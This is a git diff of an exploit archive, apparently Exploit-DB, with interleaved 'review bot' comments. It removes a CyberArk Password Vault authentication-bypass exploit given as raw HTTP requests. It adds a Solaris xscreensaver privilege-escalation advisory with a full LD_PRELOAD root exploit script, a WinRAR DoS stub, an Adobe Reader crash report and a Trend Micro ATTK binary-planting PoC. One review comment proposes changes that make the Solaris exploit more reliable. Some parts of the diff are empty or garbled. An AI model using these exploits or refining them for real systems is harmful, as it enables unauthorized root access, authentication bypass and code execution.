diff --git a/exploits/linux/webapps/47512.txt b/exploits/linux/webapps/47512.txt
deleted file mode 100644
index 59f3aaec6..000000000
--- a/exploits/linux/webapps/47512.txt
+++ /dev/null
@@ -1,80 +0,0 @@ -# Exploit Title: CyberArk Password Vault 10.6 - Authentication Bypass -# Date: 2019-10-16 -# Author: Daniel Martinez Adan (adon90) -# Vendor: https://www.cyberark.com -# Software: https://www.cyberark.com/products/privileged-account-security-solution/enterprise-password-vault/ -# Collaborator: Luis Buendía (exoticpayloads) -# Version Affected: All - -# It is possible to retrieve a valid cookie by injecting special characters -# in the username field: - -vulnerable parameter: -pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3AtxtUsername - -URL: -/PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx - -Payload: -%1F - -# Requirements: -# Using a valid ViewState -> if it doesn't work, go to the login panel to -# automatically generate a valid ViewState - - -# Once the valid cookie is obtained, it is posible to perform multiple -# actions in the PasswordVault such us: -# - Retrieving valid user information (Name, Email, Phone number….) -# - DoS -# - DNS enumeration via ip address -# - Possibly deleting users - - -# Login Bypass: - -POST /PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx HTTP/1.1 -Host: TARGET -User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:67.0) Gecko/20100101 Firefox/67.0 -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 -Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 -Accept-Encoding: gzip, deflate -Referer: https://TARGET/PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx -Content-Type: application/x-www-form-urlencoded -Content-Length: 2435 -Connection: close -Cookie: CA22222=; CA11111=; CA55555=; CA33333=; mobileState=Desktop; __cfduid=d1813e86e4633e4e19945e449038e4f7d1571219978; ASP.NET_SessionId=svcespyi2rswvxcj1wn100ca -Upgrade-Insecure-Requests: 1 
-__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=gjUPDVmn3eCu84zX77GBo4yZO5ypQSyENJ%2FiPcWTNRTh9MtlLoZ6wvk6nCnoK8MeZfh%2BUA9fqjr80wBpvTA04Xkq8mnhgITyUkAx8PuG09vlGK7CBUxV4PHxPooSWtC%2F2RccxoRIuCucsVDXD27UTCiS4VmDoUWDORoecURYhzV2PH7pXm4XGNtNxeI%2FuLXPvwVYAOYkyUZZloZALalGC54rL24Iery7YR0uYvaC61OmxhCtYVy8zHlu7p2fK%2FUHxGxw3oMKrVJA%2BTCT1%2B5AoO4apN7uA%2BBmJzFhcl9vPrdlgCdu%2F1Ei%2F1O0oVn6BOd%2BhFDHdDbpKAX6xIJAWRfb9%2BGG8qobGKR%2B8Fvhao9hx3oCieBe7BvJL%2Fe9Y61tLtvnoLBHwc7uvG4V1lg5oNcQQeEZTGosZ3xrt3dR3kZe2b6vY0QG8YVlJCv56Xb1Ylr7mI7FIbUbKxbZvIkIPrPlKTvkzUTYGXsBOVXNy9KyAhI2%2B9DVkTFFhp%2FK4uWMCMxVq%2FgRxiEyukUbWvobQxSnUH4aNntJiD0Nmlc6UzwNxfvo%2FUNJx8i0yoPoi4PMomsQTE6%2FjtAQiO9rrf6syMLp2lLqXzQ7u90BqyUB9%2BOkn2C2AKZcir2KyT4vGcVOgEfUiZ7twd%2B4uq4acPpQBNto3zBCtgtKzW5iv8TfSCRuigtaT7Oz5qZvWq7UX%2Bqye9cugocb%2BUbaWVXJqcy0Gkdm0BPrRpiCbkSYqfx%2Fo7fYuDjEnMhXrOwBCUOfHhAcjXHZeeJY%2FKsnRP0Aa2%2BNzCOPimbvVEIq0CzTonYV6WFh1a0aDc0m8Qgchz9RnYR67efSftSQYpPzsBIdp0MsFuZ5AmSPROHH37N0zWVV%2BlVvPfwuSlLFV8d5Kq41KJtucYwenrZMq7lhKcDvaRZz5LOFR71DdrYwZoPloK4BK3yl8w8GaOnyRSQsQ0yW4xj5RbJLKN5J54I2fXDkgIVMJY6dbsztZ2JO%2BTpa5xPjJCIjXTR%2B4pJTqCBWc%2FLJ0xzz6x2EOOP9eMY8RH3GaEdg8Lww66zOzpIyXiOBT0VqyRTDxVd2UnEwJZDqwmcHh1n1nN%2BAQoWk2aJDBev9WiGLSx2GxtipLElZsWTcG5txklqFKB7b5mG2jIsx4%2B%2BRlAz2q6b8YJxKem1FnJwQhTyWZ5%2BgEnEGYIylH%2FsYP2eOcBJr5J7gamu%2FsqF9fZa4AJHxEx%2BspDmzm607z8H2AqOhWRemllMT87KVlCuTKiWw3gj7bhj19KtaE1AwmHid5ISXbt%2F5Gcw4LDvDkmfR1akym0jPGdECSyJG0qbhKiE3abdXESlMCURfX6g1W%2B9i8WZJ4hDtHcsPudD6yhp32NSDa2eVqw%3D%3D&__VIEWSTATEGENERATOR=4EAA75BD&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=yRuqYr%2BEabjm0oMhAb6WmehsX2QOYJhKOP0z9IJq8R2B9Md%2Fi17pZwRXSuLkNN72eNRdEnD%2Fcjr3L3KJLehz7ol6U%2BUONvRqU3dO66PrJIvFj%2BDji4%2FvZeOpLeaI0nY9mSU7%2FdBiOgLzdPnDtNu9G%2BwlR4Z8FdWPayd8UDMqShb%2FmObsqqsoxooNVf8jUFa1X98oKyPHztYNS6ip8fIBl4ksqvsPQhZnc%2Fj%2FniKwWp2GZ%2FmnEhIYMxVVx5tirrB16M4dJqa5ROmxuL%2FJcnW0hqFlAkAycTdep5r0nvN1kXXrIco4RhE52ZbP9yKpr5%2FOyVASLr42dCgOSKXcgkFL1A%3D%3D&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3AtxtUser
name=%1F&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3AtxtPassword=&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3AbtnLogon=Sign+in&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3ANewPassword2Hidden=&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3APasswordHidden=admin&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3ANewPassword1Hidden=&AuthModuleUsed=radius&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3ASkipChangePwd= - - -# User Information: - -POST /PasswordVault/services/PrivilegedAccountAccess.asmx/GetUserDetails HTTP/1.1 -Host: TARGET -User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:67.0) Gecko/20100101 Firefox/67.0 -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 -Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 -Accept-Encoding: gzip, deflate -Referer: https://TARGET/PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx -Connection: close -Cookie: CA22222=; CA11111=; CA55555=; CA33333=; mobileState=Desktop; __cfduid=d1813e86e4633e4e19945e449038e4f7d1571219978; ASP.NET_SessionId=svcespyi2rswvxcj1wn100ca;6a5a355a-0547-40ce-9770-fc22d1f3bbea=F538D6D97C6816BC6B22F3685B502B7F0ADA08D2D672995205A3C9E00DAA41E2B679ABAEF1FFD6E6F6DB48F3BA71DA768CA995110FA093634502838D8B4C9533851442A9EE06A041FB7631E2630CDE9F79590C6FDF4E67702F70144FBBD75C75D03B5F70A50EA7F31DFFAB6A81923EF27423A9A419A72E956A76C70E5667A2B1617201BD9168B6CD125EADA08D5B81F77C3224287849EFF258172CC2D51CDF1A9C064BB9F7E4C2450ACE8954B74DE109 -Upgrade-Insecure-Requests: 1 -Content-Type: application/json -Content-Length: 28 -{"userName":"administrator"} - - -# Resolve DNS / DoS - -GET /PasswordVault/ResolveMachineAddress.aspx?data=&moreinfo=127.0.0.1 HTTP/1.1 -Host: TARGET -User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:67.0) Gecko/20100101 Firefox/67.0 -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 -Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 -Accept-Encoding: gzip, deflate -CAAjax: adon90 -Referer: 
https://TARGET/PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx -Connection: close -Cookie: CA22222=; CA11111=; CA55555=; CA33333=; mobileState=Desktop; __cfduid=d1813e86e4633e4e19945e449038e4f7d1571219978; ASP.NET_SessionId=svcespyi2rswvxcj1wn100ca;6a5a355a-0547-40ce-9770-fc22d1f3bbea=F538D6D97C6816BC6B22F3685B502B7F0ADA08D2D672995205A3C9E00DAA41E2B679ABAEF1FFD6E6F6DB48F3BA71DA768CA995110FA093634502838D8B4C9533851442A9EE06A041FB7631E2630CDE9F79590C6FDF4E67702F70144FBBD75C75D03B5F70A50EA7F31DFFAB6A81923EF27423A9A419A72E956A76C70E5667A2B1617201BD9168B6CD125EADA08D5B81F77C3224287849EFF258172CC2D51CDF1A9C064BB9F7E4C2450ACE8954B74DE109 -Upgrade-Insecure-Requests: 1 \ No newline at end of file diff --git a/exploits/solaris/local/47529.txt b/exploits/solaris/local/47529.txt new file mode 100644 index 000000000..0288c5fa6 --- /dev/null +++ b/exploits/solaris/local/47529.txt 
@@ -0,0 +1,168 @@
+@Mediaservice.net Security Advisory #2019-02 (last updated on 2019-10-16)
+
+ Title: Local privilege escalation on Solaris 11.x via xscreensaver
+ Application: Jamie Zawinski's xscreensaver 5.39 distributed with Solaris 11.4
+ Jamie Zawinski's xscreensaver 5.15 distributed with Solaris 11.3
+ Other versions starting from 5.06 are potentially affected
+ Platforms: Oracle Solaris 11.x (tested on 11.4 and 11.3)
+ Other platforms are potentially affected (see below)
+ Description: A local attacker can gain root privileges by exploiting a
+ design error vulnerability in the xscreensaver distributed with
+ Solaris
+ Author: Marco Ivaldi
+ Vendor Status: notified on 2019-07-09
+ CVE Name: CVE-2019-3010
+ CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H (Base Score: 8.8)
+ References: https://lab.mediaservice.net/advisory/2019-02-solaris-xscreensaver.txt
+ https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html
+ https://www.jwz.org/xscreensaver/
+ https://www.oracle.com/technetwork/server-storage/solaris11/
+ https://www.mediaservice.net/
+ https://0xdeadbeef.info/
+
+1. Abstract.
+
+Exploitation of a design error vulnerability in xscreensaver, as distributed
+with Solaris 11.x, allows local attackers to create (or append to) arbitrary
+files on the system, by abusing the -log command line switch introduced in
+version 5.06. This flaw can be leveraged to cause a denial of service condition
+or to escalate privileges to root.
+
+2. Example Attack Session.
+
+raptor@stalker:~$ cat /etc/release
+ Oracle Solaris 11.4 X86
+ Copyright (c) 1983, 2018, Oracle and/or its affiliates. All rights reserved.
+ Assembled 16 August 2018
+raptor@stalker:~$ uname -a
+SunOS stalker 5.11 11.4.0.15.0 i86pc i386 i86pc
+raptor@stalker:~$ id
+uid=100(raptor) gid=10(staff)
+raptor@stalker:~$ chmod +x raptor_xscreensaver
+raptor@stalker:~$ ./raptor_xscreensaver
+raptor_xscreensaver - Solaris 11.x LPE via xscreensaver
+Copyright (c) 2019 Marco Ivaldi
+[...]
+Oracle Corporation SunOS 5.11 11.4 Aug 2018
+root@stalker:~# id
+uid=0(root) gid=0(root)
+
+3. Affected Platforms.
+
+This vulnerability was confirmed on the following platforms:
+
+* Oracle Solaris 11.x X86 [tested on 11.4 and 11.3, default installation]
+* Oracle Solaris 11.x SPARC [untested]
+
+Previous Oracle Solaris 11 versions might also be vulnerable.
+
+Based on our analysis and on feedback kindly provided by Alan Coopersmith of
+Oracle, we concluded that this is a Solaris-specific vulnerability, caused by
+the fact that Oracle maintains a slightly different codebase from the upstream
+one. Alan explained this as follows:
+
+"The problem in question here appears to be inherited from the long-ago fork
+[originally based on xscreensaver 4.05] Sun & Ximian did to add a gtk-based
+unlock dialog with accessibility support to replace the non-accessible Xlib
+unlock dialog that upstream provides, which moves the uid reset to after where
+the log file opening was later added."
+
+Specifically, the problem arises because of this bit of Solaris patches:
+https://github.com/oracle/solaris-userland/blob/18c7129a50c0d736cbac04dcfbfa1502eab71e33/components/desktop/xscreensaver/patches/0005-gtk-lock.patch#L3749-L3770
+
+As an interesting side note, it appears Red Hat dropped this code back in 2002
+with version 4.05-5:
+https://src.fedoraproject.org/rpms/xscreensaver/blob/9a0bab5a19b03db9671fc5a20714755445f19e21/f/xscreensaver.spec#L2178-2179
+
+4. Fix.
+
+Oracle has assigned the tracking# S1182608 and has released a fix for all
+affected and supported versions of Solaris in their Critical Patch Update (CPU)
+of October 2019.
+
+As a temporary workaround, it is also possible to remove the setuid bit from
+the xscreensaver executable as follows (note that this might prevent it from
+working properly):
+
+bash-3.2# chmod -s /usr/bin/xscreensaver
+
+5. Proof of Concept.
+
+An exploit for Oracle Solaris 11.x has been developed as a proof of concept. It
+can be downloaded from:
+
+https://github.com/0xdea/exploits/blob/master/solaris/raptor_xscreensaver
+
+#!/bin/sh
+
+#
+# raptor_xscreensaver - Solaris 11.x LPE via xscreensaver
+# Copyright (c) 2019 Marco Ivaldi
+#
+# Exploitation of a design error vulnerability in xscreensaver, as
+# distributed with Solaris 11.x, allows local attackers to create
+# (or append to) arbitrary files on the system, by abusing the -log
+# command line switch introduced in version 5.06. This flaw can be
+# leveraged to cause a denial of service condition or to escalate
+# privileges to root. This is a Solaris-specific vulnerability,
+# caused by the fact that Oracle maintains a slightly different
+# codebase from the upstream one (CVE-2019-3010).
+#
+# "I'd rather be lucky than good any day." -- J. R. "Bob" Dobbs
+# "Good hackers force luck." -- ~A.
+#
+# This exploit targets the /usr/lib/secure/ directory in order
+# to escalate privileges with the LD_PRELOAD technique. The
+# implementation of other exploitation vectors, including those
+# that do not require gcc to be present on the target system, is
+# left as an exercise to fellow UNIX hackers;)
+#
+# Usage:
+# raptor@stalker:~$ chmod +x raptor_xscreensaver
+# raptor@stalker:~$ ./raptor_xscreensaver
+# [...]
+# Oracle Corporation SunOS 5.11 11.4 Aug 2018
+# root@stalker:~# id
+# uid=0(root) gid=0(root)
+# root@stalker:~# rm /usr/lib/secure/64/getuid.so /tmp/getuid.*
+#
+# Vulnerable platforms:
+# Oracle Solaris 11 X86 [tested on 11.4 and 11.3]
+# Oracle Solaris 11 SPARC [untested]
+#
+
+echo "raptor_xscreensaver - Solaris 11.x LPE via xscreensaver"
+echo "Copyright (c) 2019 Marco Ivaldi "
+echo
+
+# prepare the payload
+echo "int getuid(){return 0;}" > /tmp/getuid.c
+gcc -fPIC -Wall -g -O2 -shared -o /tmp/getuid.so /tmp/getuid.c -lc
+if [ $? -ne 0 ]; then
+echo "error: problem compiling the shared library, check your gcc"
+exit 1
+fi
+
+# check the architecture
+LOG=/usr/lib/secure/getuid.so
+file /bin/su | grep 64-bit >/dev/null 2>&1
+if [ $? -eq 0 ]; then
+LOG=/usr/lib/secure/64/getuid.so
+fi
+
+# start our own xserver
+# alternatively we can connect back to a valid xserver (e.g. xquartz)
+/usr/bin/Xorg :1 &
+
+# trigger the bug
+umask 0
+/usr/bin/xscreensaver -display :1 -log $LOG &
+sleep 5
+
+# clean up
+pkill -n xscreensaver
+pkill -n Xorg
+
+# LD_PRELOAD-fu
+cp /tmp/getuid.so $LOG
+LD_PRELOAD=$LOG su -
\ No newline at end of file
diff --git a/exploits/windows/dos/47525.txt b/exploits/windows/dos/47525.txt
new file mode 100644
index 000000000..117a45982
--- /dev/null
+++ b/exploits/windows/dos/47525.txt
@@ -0,0 +1,73 @@
+# Exploit Title: winrar 5.80 64bit - Denial of Service
+# Date: 2019-10-19
+# Exploit Author: alblalawi
+# Vendor Homepage: https://win-rar.com/fileadmin/winrar-versions/winrar-x64-58b2.exe
+# Version: 5.80
+# Tested on: Microsoft Windows Version 10.0.18362.418 64bit
+
+# 1- open winrar or any file.rar
+# 2- help
+# 3- help topics
+# 4- Drag the exploit to the window
+
+# Save the content html
+
+
+
+
\ No newline at end of file
diff --git a/exploits/windows/dos/47528.txt b/exploits/windows/dos/47528.txt
new file mode 100644
index 000000000..35860811a
--- /dev/null
+++ b/exploits/windows/dos/47528.txt
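Review bot: The script never confirms that the vulnerable xscreensaver actually created `$LOG` before it copies the payload and runs `su -`: on a patched target (Oracle's October 2019 CPU) or when Xorg fails to come up, `cp` fails but `LD_PRELOAD=$LOG su -` still runs and simply prompts for the root password, which hides the failure behind a plausible-looking prompt. After the `pkill` lines I would add `[ -w "$LOG" ] || { echo "error: $LOG was not created, target is probably patched"; exit 1; }`. The architecture switch selects `/usr/lib/secure/64/` when `/bin/su` is 64-bit but compiles `getuid.so` with gcc's default target, so if that default is 32-bit the runtime linker presumably skips the preload — worth passing `-m64` on that branch (inferred; the advisory reports success on 11.4, so the default may already match). For defenders, `umask 0` plus `-log` leaves a root-owned, world-writable `getuid.so` in a trusted-library directory, a cheap file-integrity indicator to pair with the `chmod -s` workaround the advisory gives.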
@@ -0,0 +1,85 @@
+We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:
+
+--- cut ---
+(7f2c.8be8): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=00000080 ebx=00001b52 ecx=00000080 edx=00000080 esi=00000001 edi=6f587000
+eip=6a005324 esp=050fbc14 ebp=050fbc34 iopl=0 nv up ei pl nz na po nc
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210202
+JP2KLib!IJP2KException::GetErrString+0x3224:
+6a005324 8817 mov byte ptr [edi],dl ds:002b:6f587000=??
+
+0:000> kb
+ # ChildEBP RetAddr Args to Child
+WARNING: Stack unwind information not available. Following frames may be wrong.
+00 050fbc34 6a0030e8 00001b52 00001b53 00000000 JP2KLib!IJP2KException::GetErrString+0x3224
+01 050fbcb0 69ff3bf0 0000000a 000002ce 00000001 JP2KLib!IJP2KException::GetErrString+0xfe8
+02 050fbd44 69ff4132 00000000 0000000d 00000008 JP2KLib!JP2KCopyRect+0xe9d0
+03 050fbda0 69ff43f9 00000000 0000000d 00000008 JP2KLib!JP2KCopyRect+0xef12
+04 050fbdc8 69ff37bc 00000000 0000000d 00000008 JP2KLib!JP2KCopyRect+0xf1d9
+05 050fbe7c 69ff31eb 050fbf88 0000000d 00000008 JP2KLib!JP2KCopyRect+0xe59c
+06 050fbebc 6a005d8a 0000000d 00000008 000000ff JP2KLib!JP2KCopyRect+0xdfcb
+07 050fbf1c 5f721b53 62c74e88 0000000d 00000008 JP2KLib!JP2KImageDecodeImageRegion+0x2a
+08 050fbf9c 5f71544b 6ad22fac 050fbfcc 5f115889 AcroRd32!AX_PDXlateToHostEx+0x343e93
+09 050fbfa8 5f115889 6ad22fac 62c7cfb0 5f1157f0 AcroRd32!AX_PDXlateToHostEx+0x33778b
+0a 050fbfcc 5f115783 6ad0efe0 00000001 0000001b AcroRd32!DllCanUnloadNow+0x4c929
+0b 050fbfec 5f561d7a 050fc010 6ad0efe0 0000001b AcroRd32!DllCanUnloadNow+0x4c823
+0c 050fc030 5f24afc8 c0020000 00000004 6ad0efe0 AcroRd32!AX_PDXlateToHostEx+0x1840ba
+0d 050fc384 5f24a506 050fc3e0 53406a98 95e3efd6 AcroRd32!DllCanUnloadNow+0x182068
+0e 050fc3bc 5f24a3e1 050fc3e0 53406a98 050fc44c AcroRd32!DllCanUnloadNow+0x1815a6
+0f 050fc428 5f2493a8 c0020000 00000004 53406a98 AcroRd32!DllCanUnloadNow+0x181481
+10 050fc888 5f2468f7 050fcb8c 686e45ac c0020000 AcroRd32!DllCanUnloadNow+0x180448
+11 050fe068 5f246575 686e45ac c0020000 00000004 AcroRd32!DllCanUnloadNow+0x17d997
+12 050fe138 5f22a25c 95e3ce72 5d91af78 00000000 AcroRd32!DllCanUnloadNow+0x17d615
+13 050fe218 5f229057 00000001 00000000 00000000 AcroRd32!DllCanUnloadNow+0x1612fc
+14 050fe264 5f21c183 5d91af78 00000001 00000000 AcroRd32!DllCanUnloadNow+0x1600f7
+15 050fe3d8 5f21ba97 553e6dbc 00000001 6a169ef8 AcroRd32!DllCanUnloadNow+0x153223
+16 050fe440 5f219281 95e3c8aa 5323efc8 5adccea8 AcroRd32!DllCanUnloadNow+0x152b37
+17 050fe4c0 5f218dae 6a169ef8 65a08f40 5adcceb8 AcroRd32!DllCanUnloadNow+0x150321
+18 050fe4fc 5f218d07 6a169ef8 65a08f40 5adcceb8 AcroRd32!DllCanUnloadNow+0x14fe4e
+19 050fe584 5f2182ee 6a169ef8 65a08f40 050fe7b8 AcroRd32!DllCanUnloadNow+0x14fda7
+1a 050fe5c0 5f216f02 6a169ef8 65a08f40 050fe7b8 AcroRd32!DllCanUnloadNow+0x14f38e
+1b 050fe884 5f215d98 6a169ef8 050fe918 050fe968 AcroRd32!DllCanUnloadNow+0x14dfa2
+1c 050fe988 5f2143b8 6a169ef8 050fea90 00000000 AcroRd32!DllCanUnloadNow+0x14ce38
+1d 050fe9ec 5f21414d 6a169ef8 050fea90 00000000 AcroRd32!DllCanUnloadNow+0x14b458
+1e 050fea0c 5f212d3c 6a169ef8 050fea90 00000000 AcroRd32!DllCanUnloadNow+0x14b1ed
+1f 050feac4 5f212762 00000001 00000000 95e3c776 AcroRd32!DllCanUnloadNow+0x149ddc
+20 050feb1c 5f21257a 7d8b4ef0 00000001 95e3c7ea AcroRd32!DllCanUnloadNow+0x149802
+21 050feb80 5f2122ff 050fec74 95e3c0fe 80882fa0 AcroRd32!DllCanUnloadNow+0x14961a
+22 050fec94 5f0d687c 80882fa0 5f0d67a0 00000000 AcroRd32!DllCanUnloadNow+0x14939f
+23 050fecac 5f0d678f 0000000f 00000000 00000000 AcroRd32!DllCanUnloadNow+0xd91c
+24 050fecc8 745de0bb 00180a60 0000000f 00000000 AcroRd32!DllCanUnloadNow+0xd82f
+25 050fecf4 745e8849 5f0d66d0 00180a60 0000000f USER32!_InternalCallWinProc+0x2b
+26 050fed18 745eb145 0000000f 00000000 00000000 USER32!InternalCallWinProc+0x20
+27 050fede8 745d8503 5f0d66d0 00000000 0000000f USER32!UserCallWinProcCheckWow+0x1be
+28 050fee50 745d8aa0 147683c0 00000000 0000000f USER32!DispatchClientMessage+0x1b3
+29 050fee98 77371a6d 050feeb4 00000020 050fef14 USER32!__fnDWORD+0x50
+2a 050feed0 745d91ee 050fef64 5a5cb65c 18836dd8 ntdll!KiUserCallbackDispatcher+0x4d
+2b 050fef24 745d8c20 5f535978 050fef48 5f0eda6d USER32!DispatchMessageWorker+0x5be
+2c 050fef30 5f0eda6d 050fef64 18836dd8 18836dd8 USER32!DispatchMessageW+0x10
+2d 050fef48 5f0ed89e 050fef64 95e3c3d6 18836dd8 AcroRd32!DllCanUnloadNow+0x24b0d
+2e 050fefbc 5f0ed744 95e3c39e 18836dd8 00000000 AcroRd32!DllCanUnloadNow+0x2493e
+2f 050feff4 5f07c575 95e3dc0e 17484ff8 00000000 AcroRd32!DllCanUnloadNow+0x247e4
+30 050ff064 5f07bf81 5f050000 00110000 17484ff8 AcroRd32!AcroWinMainSandbox+0x775
+31 050ff484 0011783d 5f050000 00110000 17484ff8 AcroRd32!AcroWinMainSandbox+0x181
+32 050ff850 002201aa 00110000 00000000 0bd5b3f2 AcroRd32_exe+0x783d
+33 050ff89c 76698674 04f5f000 76698650 c83dc0c6 AcroRd32_exe!AcroRd32IsBrokerProcess+0x992da
+34 050ff8b0 77365e17 04f5f000 07a6f6f5 00000000 KERNEL32!BaseThreadInitThunk+0x24
+35 050ff8f8 77365de7 ffffffff 7738ad9e 00000000 ntdll!__RtlUserThreadStart+0x2f
+36 050ff908 00000000 00111390 04f5f000 00000000 ntdll!_RtlUserThreadStart+0x1b
+--- cut ---
+
+Notes:
+
+- Reproduces on Adobe Acrobat Reader DC (2019.012.20036) on Windows 10, with and without PageHeap enabled.
+
+- The crash occurs immediately after opening the PDF document, and is caused by attempting to write data outside of a heap-based buffer.
+
+- Attached samples: poc.pdf (crashing file), original.pdf (original file).
+
+- We have minimized the difference between the original and mutated files down to 5 bytes inside of a binary JP2 image stream: 4 bytes at offset 0x195 changed from to <00 00 00 C0>, and 1 byte at offset 0x1ED changed from <0x53> to <0x5B>.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47528.zip
\ No newline at end of file
diff --git a/exploits/windows/local/47527.txt b/exploits/windows/local/47527.txt
new file mode 100644
index 000000000..b259c12f0
--- /dev/null
+++ b/exploits/windows/local/47527.txt
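Review bot: The minimization note at the end of the hunk has lost the original 4-byte value at offset 0x195 — it reads `changed from to <00 00 00 C0>` — so the original-versus-mutated delta cannot be reproduced or turned into a detection signature from this text alone; the value was presumably dropped as an angle-bracketed sequence during markup processing and should be restored as `changed from <…original 4 bytes…> to <00 00 00 C0>` with the real bytes. The faulting instruction `mov byte ptr [edi],dl` with `edi=6f587000` is consistent with the stated out-of-bounds heap write, but the report names only the affected build (2019.012.20036) and no fixed one, so triage should not assume later builds are unaffected without checking the vendor bulletin.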
@@ -0,0 +1,112 @@
+# Exploit Title: Trend Micro Anti-Threat Toolkit 1.62.0.1218 - Remote Code Execution
+# Date: 2019-10-19
+# Exploit Author: hyp3rlinx
+# Vendor Homepage: www.trendmicro.com
+# Version: 1.62.0.1218 and below
+# Tested on: Microsoft Windows
+# CVE: N/A
+
+
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-ANTI-THREAT-TOOLKIT-(ATTK)-REMOTE-CODE-EXECUTION.txt
+[+] ISR: Apparition Security
+
+
+[Vendor]
+www.trendmicro.com
+
+
+[Product]
+Trend Micro Anti-Threat Toolkit (ATTK)
+1.62.0.1218 and below
+
+Trend Micro Anti-Threat Toolkit (ATTK) can analyze malware issues and clean infections.
+It can be used to perform system forensic scans and clean the following infection types:
+
+General malware infection
+Master boot record Infection
+CIDOX/ RODNIX infection
+Rootkit infection
+Zbot infection
+Cryptolocker infection
+etc..
+
+
+[Vulnerability Type]
+Remote Code Execution
+
+
+[CVE Reference]
+CVE-2019-9491
+
+
+[Security Issue]
+Trend Micro Anti-Threat Toolkit (ATTK) will load and execute arbitrary .EXE files if a malware author
+happens to use the vulnerable naming convention of "cmd.exe" or "regedit.exe" and the malware can be
+placed in the vacinity of the ATTK when a scan is launched by the end user.
+
+Since the ATTK is signed by verified publisher and therefore assumed trusted any MOTW security warnings
+are bypassed if the malware was internet downloaded, also it can become a persistence mechanism as
+each time the Anti-Threat Toolkit is run so can an attackers malware.
+
+Standalone affected components of ATTK and other integrations (e.g. WCRY Patch Tool, OfficeScan Toolbox, etc.)
+
+attk_collector_cli_x64.exe
+Hash: e8503e9897fd56eac0ce3c3f6db24fb1
+
+TrendMicroRansomwareCollector64.r09.exe
+Hash: 798039027bb4363dcfd264c14267375f
+
+attk_ScanCleanOnline_gui_x64.exe
+Hash: f1d2ca4b14368911c767873cdbc194ed
+
+
+[References]
+https://success.trendmicro.com/solution/000149878
+*All versions of the ATTK have been updated with the newer version. Anti-Threat Toolkit (ATTK) 1.62.0.1223
+
+
+[Exploit/POC]
+Compile an .EXE using below "C" code and use naming convention of "cmd.exe" or "regedit.exe".
+Run the Anti-Threat Toolkit and watch the ATTK console to see the Trojan file get loaded and executed.
+
+#include
+
+void main(void){
+ puts("Trend Micro Anti-Threat Toolkit PWNED!");
+ puts("Discovery: hyp3rlinx");
+ puts("CVE-2019-9491\n");
+ WinExec("powershell", 0);
+}
+
+
+[POC Video URL]
+https://www.youtube.com/watch?v=HBrRVe8WCHs
+
+
+[Network Access]
+Remote
+
+
+[Severity]
+High
+
+
+[Disclosure Timeline]
+Vendor Notification: September 9, 2019
+Vendor confirms vulnerability: September 25, 2019
+Vendor requests to coordinate advisory: September 25, 2019
+October 19, 2019 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
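Review bot: The write-up labels this Remote Code Execution with `[Network Access] Remote`, yet the vector it describes requires an attacker-controlled file named `cmd.exe` or `regedit.exe` to already be on disk near ATTK and a user to launch a scan — that is binary planting through an untrusted search path, and this same commit's `files_exploits.csv` row files 47527 as `local`, so the title and `[Network Access]` should read `Local` (or the advisory should spell out the remote leg of the chain, e.g. the MOTW-bypass on a downloaded archive it alludes to). "Placed in the vacinity of the ATTK" is too vague to reproduce or to write a detection for; name the directory ATTK resolves `cmd.exe` from (presumably its working or extraction directory — confirm against the video) and note that the developer fix is to invoke system tools by absolute path. As committed, the PoC's `#include` directive names no header; `puts` and `WinExec` need `<stdio.h>` and `<windows.h>`, which were possibly stripped as markup.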
